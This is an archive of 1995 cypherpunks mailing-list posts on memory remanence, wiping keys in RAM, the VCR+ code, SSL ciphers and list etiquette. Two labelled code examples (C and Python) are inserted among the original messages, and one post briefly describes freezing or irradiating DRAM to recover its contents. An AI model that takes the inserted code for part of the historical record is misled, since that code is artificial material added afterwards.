To: cypherpunks@toad.com
Subject: Re: Emergency File Wipe Algorithim
In-Reply-To: <8B074DD.00030003EA.uuout@famend.com>
Message-ID: <QkGx9vW00iV2Q5kEEr@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 4-Sep-95 Re: Emergency File Wipe
Alg.. by MONTY HARDER@famend.com 
> CW> and relaxation are in the same order of magnitude.  Thus, a few microseconds of
> CW> storing the opposite data to the currently stored value will have little effect
> CW> on the oxide.  Ideally, the oxide should be exposed to as much stress at the
>  
>   Here is a simple way to handle the problem, using our old discredited
> friend, XOR. Set up your software to periodically XOR the key with FFFF.
> This way, each bit will be a 0 half the time, and a 1 the other half.
> You have a flag that tells whether the key is in normal or inverted
> form, so that you can quickly perform any necessary computations on it,
> but there should not be any long-term memory effect.
>  
>  

    On today's machines, it's a little more complicated than that. 
After you XOR the key, you have to then flush all the cache lines that
contain the key, to make sure that the XOR operation makes it to the
main memory.  Unless I'm mistaken, a write-back cache will not propagate
the XOR operation to main memory unless another memory operation(s)
bumps the XORed key out of cache memory.  Successive XOR
operations on the key won't necessarily do this; you need some other
memory op to flush the cache lines.

    

_____________________________________________________________________________
 
 Tim Nali            \  "We are the music makers, and we are the dreamers of
 tn0s@andrew.cmu.edu  \   the dreams" -Willy Wonka and the Chocolate Factory
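
[Added example, not part of the original message or of any poster's code: the periodic XOR-with-FF inversion quoted above, combined with the cache flush this reply calls for, in C. It assumes an x86 target with SSE2 (for _mm_clflush), a 64-byte cache line and single-threaded use; the names flip_key, fk_init, fk_flip, fk_read and fk_selftest are hypothetical, and the key is constructed sample data.]

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#if defined(__SSE2__)
#include <emmintrin.h>            /* _mm_clflush, _mm_mfence */
#endif

#define KEY_LEN    16
#define CACHE_LINE 64             /* assumed cache line size in bytes */

/* Key held either as-is or bitwise inverted; `inverted` records which.
   volatile keeps the compiler from eliding or merging the stores. */
struct flip_key {
    volatile uint8_t bytes[KEY_LEN];
    volatile int     inverted;
};

/* Write back and evict every cache line covering [p, p+len).
   Returns 1 if a real flush instruction was issued, 0 if this target
   only gave us a memory barrier (which does NOT push data to DRAM). */
static int flush_range(const volatile void *p, size_t len)
{
#if defined(__SSE2__)
    uintptr_t a   = (uintptr_t)p & ~(uintptr_t)(CACHE_LINE - 1);
    uintptr_t end = (uintptr_t)p + len;
    for (; a < end; a += CACHE_LINE)
        _mm_clflush((const void *)a);
    _mm_mfence();                 /* order the flushes before later accesses */
    return 1;
#else
    (void)p; (void)len;
    __sync_synchronize();
    return 0;
#endif
}

void fk_init(struct flip_key *k, const uint8_t key[KEY_LEN])
{
    for (size_t i = 0; i < KEY_LEN; i++)
        k->bytes[i] = key[i];
    k->inverted = 0;
    flush_range(k, sizeof *k);
}

/* The periodic step: invert every bit, toggle the flag, then force the
   new pattern out of the write-back cache so the DRAM cells change too. */
void fk_flip(struct flip_key *k)
{
    for (size_t i = 0; i < KEY_LEN; i++)
        k->bytes[i] = (uint8_t)(k->bytes[i] ^ 0xFFu);
    k->inverted = !k->inverted;
    flush_range(k, sizeof *k);
}

/* Recover the true key whichever form is stored. The caller's buffer is
   an ordinary copy and should be short-lived and wiped after use. */
void fk_read(const struct flip_key *k, uint8_t out[KEY_LEN])
{
    uint8_t mask = k->inverted ? 0xFF : 0x00;
    for (size_t i = 0; i < KEY_LEN; i++)
        out[i] = (uint8_t)(k->bytes[i] ^ mask);
}

/* Runs `rounds` flips on a constructed key and returns how many rounds
   left the stored bytes in the form the flag claims (complement on odd
   rounds, plain on even) while fk_read still returned the original. */
int fk_selftest(int rounds)
{
    static const uint8_t key[KEY_LEN] = {   /* constructed sample key */
        0x00, 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77,
        0x88, 0x99, 0xAA, 0xBB, 0xCC, 0xDD, 0xEE, 0xFF
    };
    struct flip_key k;
    uint8_t out[KEY_LEN];
    int ok = 0;

    fk_init(&k, key);
    for (int r = 1; r <= rounds; r++) {
        fk_flip(&k);
        fk_read(&k, out);
        int good = (k.inverted == (r & 1));
        for (size_t i = 0; i < KEY_LEN; i++) {
            uint8_t want = (r & 1) ? (uint8_t)~key[i] : key[i];
            if (k.bytes[i] != want || out[i] != key[i])
                good = 0;
        }
        ok += good;
    }
    return ok;
}

int main(void)
{
    printf("rounds verified: %d of 5\n", fk_selftest(5));
    return 0;
}
```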






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Thu, 7 Sep 95 09:15:36 PDT
To: Black Unicorn <unicorn@access.digex.net>
Subject: Re: NSA says Joe Sixpack won't buy crypto
In-Reply-To: <Pine.SUN.3.91.950904235841.8362A-100000@access2.digex.net>
Message-ID: <Pine.D-G.3.91.950905004357.26392B-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 5 Sep 1995, Black Unicorn wrote:

> On Mon, 4 Sep 1995, Jeff Simmons wrote:
> 
> > 
> > Here's a prediction:  within one year, we will see the advent of Micro$oft's
> > "Not So Bad Privacy".  It'll be a secret algorithm with either GAK done by
> > Micro$oft itself, or a flat-out trap door.  ANY communications with a 
> > Windoze box or network will have to use it, or lose the market.
> 
> 
> It's here already.
> It's called "lotus notes."
> 
> 
> > About the
> > same time, Justice will suddenly 'lose interest' in its various 
> > investigations of M$.  Micro$oft will probably give it away for free as part
> > of the Windows 95.702 upgrade. 
> 
> Wait a few months.  Justice is boring of the investigation even now.

I hope this doesn't mean the Department is switching to Microsoft Word! :-)
(In fact, we're about to go to WP6.0 for Windows.  And the 6.0 is not a 
typo.)


 
> > -- 
> > Jeff Simmons                           jsimmons@goblin.punk.net

EBD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dr261@cleveland.Freenet.Edu (Tobin T Fricke)
Date: Tue, 5 Sep 95 00:01:46 PDT
To: cypherpunks@toad.com
Subject: Re: article/author ratings/reputations (was Re: pseudonyms & list health)
Message-ID: <199509050701.DAA15561@kanga.INS.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


This idea of "ratings" over usenet is very interesting..  If anyone
has additional info or URLs where I can look, please send me
"private" mail at dr261@cleveland.freenet.  (Or post them to the
list, but it doesn't seem crypto-related.)
Thanks.

--
Tobin Fricke (aka LightRay)       The Digital Forest BBS (714)586-6142
dr261@kanga.ins.cwru.edu          KE6WHF Amateur Radio, 1:103/925 fido




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Tue, 5 Sep 95 00:54:29 PDT
To: sdw@lig.net (Stephen D. Williams)
Subject: Re: VCRPLUS Huffman code
Message-ID: <v02130510ac71a8536690@[166.84.254.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 20:06 9/4/95, Stephen D. Williams wrote:
>It was broken, and I might have the reference in my archives...
>
>If I get time I'll find it.

Why not just do the simple thing and look at Gemstar Development
Corporation's Patent for the details <g>.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 5 Sep 95 09:46:15 PDT
To: <cypherpunks@toad.com>
Subject: "This discussion is off-topic, please take it elsewhere"
Message-ID: <ac71c5aa03021004a06d@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:58 AM 9/5/95, Sandy Sandfort wrote:
>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>                          SANDY SANDFORT
> . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
>
>C'punks,
>
>This is not a crypto post, but those interested in threat models
>and counter-measures might want to read on.

This brings up an important issue. Sorry it is not written in C, or even TCL.

I actually agree with a point the noted tentacle VZNuri ("visionary,"
obviously) wrote, namely, that people are getting entirely too apologetic
(myself included, though most of my "apologies" have had an ironic edge to
them) about posting things that are other than about coding in C, writing
sockets for Windows, or breaking SSL.

Folks, this list is about a _lot more_ than just some facet of writing
software. It started as a wide-ranging list, with many topics, many
interests. I don't think I need to try to list the topics, but they
obviously include things such as legal issues, policy, PGP, remailers,
digital money, money laundering, regulatory arbitrage, data havens,
steganography, languages, frameworks, Unix utilities, and dozens of other
related topics. We've covered hundreds of topics, and are probably the only
such list on the planet that routinely considers the ramifications and ways
of actually building the exciting ideas that the academics at the Crypto
conferences discover and write about.

(I can tell you that one of the main motivations we (Eric and I) had in
starting the group was to take the academic abstractions, things like "bit
commitment" and "dining cryptographers networks" and reify them into actual
blocks of code, or running programs.)

Some have argued that "Cypherpunks write code," which has been a short
slogan making it clear that one of our main interests is in actually
building and deploying these methods. This was a major goal in the spring
of 1992 when Eric (Hughes, for any newcomers) and I spent time hashing out
what is needed in crypto.

As far as I'm concerned, we're on track. Remailers have advanced far beyond
the early remailers, and that they exist at all is an accomplishment. The
"theory" of remailers is immensely accelerated by having actual remailers
in actual use to test theories against and to see real world behaviors.

Likewise, message pools have been built. A working anonymous market
(BlackNet, for example) has been instantiated, albeit not proliferated.
Digital money in various forms (Magic Money, work with Chaum's DigiCash,
etc.) has been used.

Lots of other examples. PGP, hooks to mail programs (though a lot more are
needed), key escrow considerations, etc.

Of course, things have gone more slowly in some areas than in others.
Digital money, and financial instruments in general, have proceeded in fits
and starts. I suspect this indicates that things like money are not done
lightly, and that many non-coding issues are intertwined in such a way as
to make any "amateur" efforts problematic. But it's only through trying
that the obstacles can be seen, so even our failures are useful.

Is this "writing code" in all cases? Of course not. Not everything is
coding. Planning and preparing is just as important. And consideration of
threat models is part and parcel of writing code, else one will not know
where to start writing code. Thus, for example, the hundreds of posts here
on key escrow (and some of us anticipated Clipper six months before it was
announced, allowing the Cypherpunks to hit the ground running as soon as it
was announced) and GAK are useful in countering the arguments of those who
have spent years planning such escrow (GAK) policies.

What I'm getting at is that the "Cypherpunks write code" mantra does not
mean that _only_ the few dozen folks actively writing C code can
contribute. Indeed, many of the folks now writing code have _claimed_ that
they were inspired to write some code in some area--remailers, digital
cash, SSL challenges, whatever--by the discussions here on this list.

Would they have been so inspired if all political, legal, and cultural
discussions had been expunged, if only the arcana of programming and C
were being discussed? After all, sci.crypt already exists, and even
sci.crypt.research, so why should the Cypherpunks list even exist, as these
groups are already ostensibly focussed on pure crypto issues.

No, Cypherpunks is about more than just C programming, about more than just
IETF issues, about more than just algorithms.

I think it great that so much programming discussion occurs, that so much
progress is being made. I just think some list.cops are going a bit
overboard in their denunciations of "off-topic" posts, and their increasing
shrillness in saying that anyone not out there writing Unix crypto programs
should stop posting.

Those who only want to read about "malloc" and "struct" are encouraged to
use the filtering tools which they surely have access to and to stop
telling us in shrill voices that posts are "off-topic."

--Tim May


---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 5 Sep 95 10:02:53 PDT
To: cypherpunks@toad.com
Subject: Re: SUMMARY: Not-so-volatile volatile memory
Message-ID: <ac71ceef04021004ce0a@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:54 AM 9/5/95, Anonymous wrote:
>> -- Summary: Data retention in semiconductor memory --
>>
>> Contrary to conventional wisdom, "volatile" semiconductor memory
>> does not entirely lose its contents when power is removed.  Both
>> static (SRAM) and dynamic (DRAM) memory retain some information on
>> the data stored in it while power was still applied.  SRAM is
>> particularly susceptible to this problem, as storing the same data
>> in it over a long period of time has the effect of altering the
>> preferred power-up state to the state which was stored when power
>> was removed.  Older SRAM chips could often "remember" the previously
>> held state for several days.  In fact, it is possible to manufacture
>> SRAM's which always have a certain state on power-up, but which can
>> be overwritten later on - a kind of "writeable ROM".
>
>Is this a new discovery?  When I used to work with DOD classified
>data, not so long ago, disk drives had to be declassified using an
>approved program, such as Norton Utilities' "WIPEINFO".  (That was
>approved up through the SECRET/SAR level, anyway.  I don't know
>about TS/SCI/SI.)  But those same regulations said that RAM was
>considered declassified within a certain time (30 seconds, I think)
>after power was removed.  (That time figure was UNclassified, BTW.)
>I think it was just to allow time for the voltage to bleed off of
>the power supply's filter capacitors, and not related to the
>relative volatility of DRAM.

The Gutmann article was discussing residual/remnant storage a lot more
subtle than the usual "bleed-off" characteristics.

One interesting twist is using radiation sources to "snapshot" or "freeze"
the internal contents of dynamic RAM.

I worked with DRAMs for more than a decade at Intel, though never on this
particular issue. But I read a lot of the public papers on radiation
effects on DRAMS, including the "freezing" of data patterns into DRAMs by
exposure.

(I recall thinking at the time, circa 1980, that someday raids on computers
could involve bringing in flash radiation sources to "snapshot" the
contents of DRAM.)

Sandia Labs did a lot of the work on this, and results are reported at the
annual Nuclear and Space Radiation Effects Conference. The December issue
of "IEEE Transactions on Nuclear Science" every year includes the
proceedings of this conference. Any large university library should have
it.

It's also possible to literally freeze a DRAM--with "Arctic Freeze" spray,
for example--and stop the self-discharge of DRAM cells.

I doubt any of these efforts are being used, though. Looking at how raided
computers are simply carted off in the backs of pickup trucks, with disk
drives thrown in with monitors, I suspect nothing this sophisticated has
ever been tried. Quantico might have some more sophisticated approaches,
but they're not publicly discussing them.

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Tue, 5 Sep 95 10:33:28 PDT
To: hfinney@shell.portal.com
Subject: Re: Slightly faster checking for encrypted messages to me
Message-ID: <v02120d01ac72297cb133@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



Hal --

I've actually given this some thought in the past, and
the most practical solution IMHO is much lower tech, although it
only works on non-initial messages in a correspondence.

If two entities want to communicate via a message pool,
without worrying about traffic analysis, but don't want
the overhead of trying to decrypt every headerless
message to the pool, then they can do the following:

1) In a "headered" message, one of the entities (A) sends
   a collection of large random numbers to be used as return
   markers, encrypted with the public key of the desired
   correspondent (B).

2) B can then respond to A with an essentially headerless
   message prefixed with one of the numbers sent by A.
   This initial message should contain a list of similar
   numbers for B, that A can use to send messages to B.

3) Numbers are only used once; entities can now quickly
   scan the message pool by hashing the initial N bits
   of each message into a lookup table seeded with all
   the remaining random return markers they've distributed.

4) As an extension, you can divide your message pools
   into "initial contact" pools, which would begin with
   headerless public key encrypted blocks, and "conversation"
   pools that would begin with return markers. (Of course
   this is trivially open to denial of service attacks.)

This is the basic principle behind the TA-resistant streams
over UDP stuff I wrote up for cypherpunks last spring, except
in that case a given server does the lookup first, and only
then tries to treat the header as a public key encrypted
block instead of a MAC.

The Rabin stuff is a step in the right direction for the long
term, however.
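
[Added example, not part of the original post and not the author's code: a Python model of steps 1-3 above, showing the pool scan as one table lookup per message and the one-time use of each marker. The 16-byte marker size and all class, method and peer names are assumptions; opaque byte strings stand in for the public-key ciphertext, and the pool contents are constructed.]

```python
import secrets

MARKER_BYTES = 16  # assumption: the post only says "large random numbers"


class Correspondent:
    """One party that hands out return markers and scans a shared pool for them."""

    def __init__(self):
        # Markers we issued and have not yet seen used -> peer they were given to.
        # The dict is the hash lookup table from step 3.
        self.issued = {}
        # Markers other peers gave us, for addressing messages to them.
        self.to_use = {}

    def issue_markers(self, peer, count=4):
        """Steps 1/2: create fresh markers for `peer`. In the post these travel
        inside a message encrypted with the peer's public key."""
        fresh = [secrets.token_bytes(MARKER_BYTES) for _ in range(count)]
        for marker in fresh:
            self.issued[marker] = peer
        return fresh

    def receive_markers(self, peer, markers):
        """Store markers that `peer` sent us so we can address them later."""
        self.to_use.setdefault(peer, []).extend(markers)

    def address(self, peer, ciphertext):
        """Step 2: prefix an otherwise headerless message with an unused marker."""
        unused = self.to_use.get(peer)
        if not unused:
            # Out of markers: only a headered / initial-contact message is possible.
            raise LookupError(f"no unused return markers for {peer}")
        return unused.pop() + ciphertext  # popped, so never sent twice

    def scan(self, pool):
        """Step 3: look up the first MARKER_BYTES of every pool message.
        Returns (peer, ciphertext) pairs; no trial decryption is needed to
        reject the messages meant for other people."""
        hits = []
        for blob in pool:
            # pop() consumes the marker, so a replayed copy no longer matches.
            peer = self.issued.pop(blob[:MARKER_BYTES], None)
            if peer is not None:
                hits.append((peer, blob[MARKER_BYTES:]))
        return hits


def demo():
    a, b = Correspondent(), Correspondent()
    # Step 1: A gives B four markers (sent headered and encrypted in the post).
    b.receive_markers("A", a.issue_markers("B"))

    # Constructed pool: random blobs stand in for other people's traffic.
    pool = [secrets.token_bytes(64) for _ in range(1000)]
    message = b.address("A", b"<ciphertext for A>")
    pool.insert(500, message)
    pool.append(message)  # a replayed copy of the same message

    hits = a.scan(pool)
    return hits, len(a.issued)


if __name__ == "__main__":
    hits, remaining = demo()
    print(hits, "markers still outstanding:", remaining)
```

A match only tells the recipient which message to try decrypting; the body still has to decrypt and verify before it is trusted.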






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Tue, 5 Sep 95 07:35:31 PDT
To: cypherpunks@toad.com
Subject: Re: VCRPLUS Huffman code
Message-ID: <9509051435.AA15596@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



> Has anyone worked out the VCRPLUS code?

It was partially broken a few years ago, and the results published in
Cryptologia. I have a xerox in a carton somewhere. 

The break was for codes up to 4 or 5 digits long, if I recall - this covers
most of the major timeslots on the main stations. Longer codes
cover odd timeslots on less popular stations.

Code which implemented this partial crack was published on the net,
and the VCR+ people got very upset about it - apparently they make
money selling the codes to TV Guide and newspapers. It's protected
as a trade secret, not a patent.

It used a combination of lookup tables and Huffman codes, and
included a certain amount of obfuscation to resist cracking.

Peter


Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Tue, 5 Sep 95 07:55:29 PDT
To: trei@process.com
Subject: Re: Non-US SSL128 site
In-Reply-To: <9509051446.AA16057@toad.com>
Message-ID: <199509051449.KAA13448@joplin.bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



| Netscape sells a 128-bit US-only client for $39


	Does the US only server also do des, 3des and IDEA, or just
rc4-128?

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Tue, 5 Sep 95 07:46:52 PDT
To: cypherpunks@toad.com
Subject: Re: Non-US SSL128 site
Message-ID: <9509051446.AA16057@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> > a) Use 128 bit SSL if the client allows it.
> > b) Tell users which cipher is being used on a secure session.
 
> Netscape's press release on the RC4-40 crack seems to have disappeared from
> their home page, but I don't remember any specific mention of 128-bit
> U.S.-only clients, just servers.

> So what's up?

Netscape sells a 128-bit US-only client for $39

Peter

Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Barber <jeffb@sware.com>
Date: Tue, 5 Sep 95 08:12:35 PDT
To: adam@bwh.harvard.edu (Adam Shostack)
Subject: Re: Non-US SSL128 site
In-Reply-To: <199509051449.KAA13448@joplin.bwh.harvard.edu>
Message-ID: <9509051506.AA09665@wombat.sware.com>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack writes:

> | Netscape sells a 128-bit US-only client for $39

> 	Does the US only server also do des, 3des and IDEA, or just
> rc4-128?

Yes.  It does:

    RC4 - 128
    RC4 - 40
    RC2 - 128
    RC2 - 40
    IDEA
    DES, "64 bits"
    DES "with EDE 3, 192 bits"


-- Jeff



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cg@bofh.lake.de (Cees de Groot)
Date: Tue, 5 Sep 95 02:37:38 PDT
To: monty.harder@famend.com
Subject: Re: maximizing cryptographic return
In-Reply-To: <8B072A1.00030003E8.uuout@famend.com>
Message-ID: <m0spu0n-000PZnC@bofh.lake.de>
MIME-Version: 1.0
Content-Type: application/x-pgp-message

application/pgp-message


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Tue, 5 Sep 95 09:45:12 PDT
To: hallam@w3.org
Subject: Re: Emergency File Wipe Algorithim
Message-ID: <9509051644.AA00586@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Peter Gutmann writes in an article quoted by Christian Wettergren
>  The greater the amount of time that new data has existed in the
>  cell, the more the old stress is "diluted", and the less reliable
>  the information extraction will be.  Generally, the rates of change
>  due to stress and relaxation are in the same order of magnitude.
>  Thus, a few microseconds of storing the opposite data to the
   ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ 	
>  currently stored value will have little effect on the oxide.
   ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ 	

Phill Hallam writes:
>  If the power is cycled as opposed to turned off only then a memory
>  self test program will probably erase the data.

Assuming Peter Gutmann is correct, a memory test program "probably" won't do much.

Of course, your data must be worth quite a pretty penny for an attacker to
attempt to recover data from the oxides on the cells in your RAM.


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Tue, 5 Sep 95 02:54:36 PDT
To: mail2news@utopia.hacktic.nl
Subject: Re: SUMMARY: Not-so-volatile volatile memory
Message-ID: <199509050954.LAA15934@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



> -- Summary: Data retention in semiconductor memory --
> 
> Contrary to conventional wisdom, "volatile" semiconductor memory
> does not entirely lose its contents when power is removed.  Both
> static (SRAM) and dynamic (DRAM) memory retain some information on
> the data stored in it while power was still applied.  SRAM is
> particularly susceptible to this problem, as storing the same data
> in it over a long period of time has the effect of altering the
> preferred power-up state to the state which was stored when power
> was removed.  Older SRAM chips could often "remember" the previously
> held state for several days.  In fact, it is possible to manufacture
> SRAM's which always have a certain state on power-up, but which can
> be overwritten later on - a kind of "writeable ROM".

Is this a new discovery?  When I used to work with DOD classified
data, not so long ago, disk drives had to be declassified using an
approved program, such as Norton Utilities' "WIPEINFO".  (That was
approved up through the SECRET/SAR level, anyway.  I don't know
about TS/SCI/SI.)  But those same regulations said that RAM was
considered declassified within a certain time (30 seconds, I think)
after power was removed.  (That time figure was UNclassified, BTW.)
I think it was just to allow time for the voltage to bleed off of
the power supply's filter capacitors, and not related to the
relative volatility of DRAM.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Lane <blane@eskimo.com>
Date: Tue, 5 Sep 95 12:07:37 PDT
To: Peter Trei <trei@process.com>
Subject: Re: VCRPLUS Huffman code
In-Reply-To: <9509051435.AA15596@toad.com>
Message-ID: <Pine.SUN.3.91.950905120136.15689A-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 5 Sep 1995, Peter Trei wrote:

> 
> > Has anyone worked out the VCRPLUS code?
> 

  <chomp>

> Code which implemented this partial crack was published on the net,
> and the VCR+ people got very upset about it - apparently they make

  I believe the code is in the cookbook archive at ftp.ee.ualberta.ca, 
but when I just tried to confirm I got timeouts.

   Brian

------------------------------------------------------------------------------
 ftp.eskimo.com/blane     |                       |     www.eskimo.com/~blane
------------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Fred Sammet <wec@dallas.net>
Date: Tue, 5 Sep 1995 12:17:54 -0500
To: Jonathan Allen <jonathan@mirror.demon.co.uk>
Subject: Re: response (fwd)
Message-ID: <2989ce0b6683a4c535b5c428f0e0275e@NO-ID-FOUND.mhonarc.org>
MIME-Version: 1.0
Content-Type: text/plain




>> What we need is for Fred to send to you a copy of the 
>> program in electronic form (I'm waiting for the too -- then I can 
>> highlight the important sessions for you.


ANNOUNCING:


The Second Annual . . .


	WORLDWIDE ELECTRONIC COMMERCE
	Law, Policy, Security &
	Controls Conference


   October 18-20, 1995
   At the Hyatt Regency Bethesda


   Phone: (214) 516-4900


The Second Annual WorldWide Electronic Commerce; Law, Policy,
Security and Controls conference is fast approaching. This
important event will feature the world's foremost experts
addressing the most important issues of implementation and
control related to secure electronic commerce. It will
focus on current problems and provide a foundation for dealing
with the emerging problems that promise to make the future
more complex. We have been fortunate in securing a faculty
that is unusually qualified and internationally recognized
who will share their experience, knowledge and theories on
the wide range of issues being addressed by this program.
We are equally pleased to have obtained affiliation for
this conference of a number of prestigious and influential
organizations.

Please join us and your colleagues at this unique event!

   Michael S. Baum, J.D., M.B.A. Conference Chair



Provided in Affiliation with:
=============================================
* American Bar Association
  Section of Science and Technology
  Information Security Committee

* University of London
  Queen Mary & Westfield College
  Centre for Commercial Law Studies

* EDI Association of the United Kingdom

* Harvard Law School

* International Union of Latin Notaries

* International Chamber of Commerce, Paris

* National Institute of Standards and Technology (NIST)

* Software Publishers Association

* United Nations
  Commission on International Trade Law (UNCITRAL)

* U.S. Council of International Business
=============================================


Keynote Speaker:
----------------
   Dr. Vinton G. Cerf, Ph.D.
   Senior Vice President
   MCI Telecommunications Corp.



CONFERENCE PROGRAM ...at a glance

  GENERAL SCHEDULE
  -------------------------------------------------
    Wednesday, October 19, 1995  6:00pm - 7:30pm
    SECURE ELECTRONIC COMMERCE FOR THE BEGINNER

    Thursday, October 20, 1995
      8:00am - 9:00am	Welcome & Keynote Speech
      9:00am - 5:50pm	Sessions 1 - 5

    Friday, October 21, 1995
      8:00am - 4:50pm	Sessions 6 - 10


----------------------------------------------
TRACK - A
AGREEMENTS, LEGISLATION, POLICY AND REGULATION
----------------------------------------------
Session 1
So Who's in Charge, Anyway?
The Impact of National & Int'l Leadership & Initiatives in Secure EC
   SPEAKERS:
     Harold S Burman, Esq., Office of the Legal Advisor
     Sally  Katzen, Office of Management and Budget
     Bruce  McConnell, Office of Management & Budget
     Renaud  Sorieul, Esq., UNCITRAL

Session 2
Drafting Agreements for Secure Electronic Commerce
   SPEAKERS:
     Michael S Baum, Esq., Independent Monitoring
     Thomas J Smedinghoff, Esq., McBride Baker & Coles
     Joe  Wackerman, Esq., United States Postal Service

Session 3
Are Privacy Requirements Inhibiting Electronic Commerce?
   SPEAKERS:
     Kenneth C Bass III, Esq., Venable, Baetjer, Howard & Civiletti
     Prof. George  Trubow, The John Marshall Law School
     Ian  Walden, Ph.D., Commission of the European Communities

Session 4
Alternative Methods of Signing:
Legal Aspects of the IRS's July 1995 Regulation
   SPEAKERS:
     Tom  Baker, Esq., Internal Revenue Service
     Lynn  Casimir, Esq., Internal Revenue Service
     Celia  Gabrysh, Esq., Internal Revenue Service

Session 5
Digital Signature Legislation and Electronic Commerce
   SPEAKERS:
     Alan  Asay, Esq., Utah Department of Commerce
     Kirk W Dillard, Esq., State Senator, State of Illinois
     Dean  Sutherland, State Senator, Washington State
     William E. Wyrough, Jr., J.D., M.B.A., Florida Legislature

Session 6
The Legal Status and Effect of Digital Signatures - Perspectives
   SPEAKERS:
     Prof. Mads  Andersen, University of Copenhagen
     Mario  Miccoli, International Union of Latin Notaries

Session 7
On-Line Registration vs. In-Person Registration:
What Satisfies Business and Legal Requirements?
   SPEAKERS:
     Phillip  Hallam-Baker, Massachusetts Institute of Technology
     Jeff  Treuhaft, Netscape Communications Corporation
     Peter  Williams, Verisign

Session 8
Antitrust in Electronic Commerce:
Shopping, Payments & Certification Authorities
   SPEAKERS:
     Prof. Mads  Andersen, University of Copenhagen
     John  Greanley, Esq., US Department of Justice, Antitrust Division

Session 9
Proving Secure Computer-Based Transactions: Evidence Revisited
   SPEAKERS:
     Margaret A Berger, Brooklyn Law School
     Charles  Nesson, Harvard Law School
     Ian  Walden, Ph.D., Commission of the European Communities

Session 10
Third Party Service Providers & Certification Authorities-Can They 
Successfully Limit their Liability
   SPEAKERS:
     Bruce  Hunter, Esq., General Electric Information Services
     Ellen  Kirsh, Esq., America On Line
     Renaud  Sorieul, Esq., UNCITRAL

--------------------
TRACK - B
INFORMATION SECURITY
--------------------
Session 1
Requirements for Implementing Reasonable Security Procedures
   SPEAKERS:
     Robert  Daniels, Esq., U.S. Social Security Administration
     Dain  Gary, Morgan Stanley
     Allan M Shiffman, Terisa Systems, Inc.

Session 2
Information Security Standards: Policy, Coordination & Interoperability
   SPEAKERS:
     Marty  Ferris, US Department of Treasury
     Hoyt  Kesterson II, Bull Worldwide Information Systems
     Peter  Landrock, Ph.D., CRYPTOMATHIC
     David  Solo, Bolt, Beranek and Newman

Session 3
Who's Really on the Other End:
Identification Technologies and Nonrepudiation
   SPEAKERS:
     Benjamin  Miller, Personal Identification News
     John E Siedlarz, IriScan, Inc.
     William  Sweet, National Semiconductor

Session 4
Security and Security Policy in Internet-based Payments Systems
   SPEAKERS:
     Marty  Ferris, US Department of Treasury
     Tim  Jones, Mondex
     Anne  Wallace, US Department of Treasury

Session 5
When You Forget Your PIN or Die: Key Escrow in Secure Electronic Commerce
   SPEAKERS:
